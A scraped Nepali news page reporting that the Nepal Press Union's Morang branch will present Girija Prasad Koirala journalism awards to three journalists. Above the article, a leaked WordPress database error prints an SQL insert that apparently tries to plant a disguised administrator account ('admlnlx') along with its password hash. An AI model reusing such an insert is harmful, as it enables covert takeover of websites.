WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9G1ZAE0biGS0ufLk/0y9biX1VGFL7/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 14:49:46', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । गिरिजाप्रसाद कोइराला पत्रकारिता पुरस्कार तीन सञ्चारकर्मीलाई प्रदान गरिने भएको छ ।
नेपाल प्रेस युनियन मोरङ शाखाले २०७७ सालको गिरिजाप्रसाद कोइराला पत्रकारिता पुरस्कारबाट नेपाल प्रेस युनियनका केन्द्रीय उपाध्यक्ष शेखर रेग्मीलाई सम्मानित गर्ने आज निर्णय गरेको छ । कोरोना भाइरसको महामारीका कारण उक्त पुरस्कार गत वर्ष प्रदान गर्न सकिएको थिएन ।
यस्तै गिरिजाप्रसाद कोइराला पत्रकारिता पुरस्कार, २०७८ बाट युनियनका पूर्व जिल्ला अध्यक्ष कुमोद अधिकारी र पूर्व जिल्ला कोषाध्यक्ष दिनेश गिरीलाई सम्मानित गरिने नेपाल प्रेस युनियन मोरङका सचिव गोपाल पोखरेलले जानकारी दिए । पुरस्कारको राशि जनही रु १५ हजार रहेको छ । सो पुरस्कार यही कात्तिक १७ गते प्रदान गरिने सचिव पोखरेलले बताए ।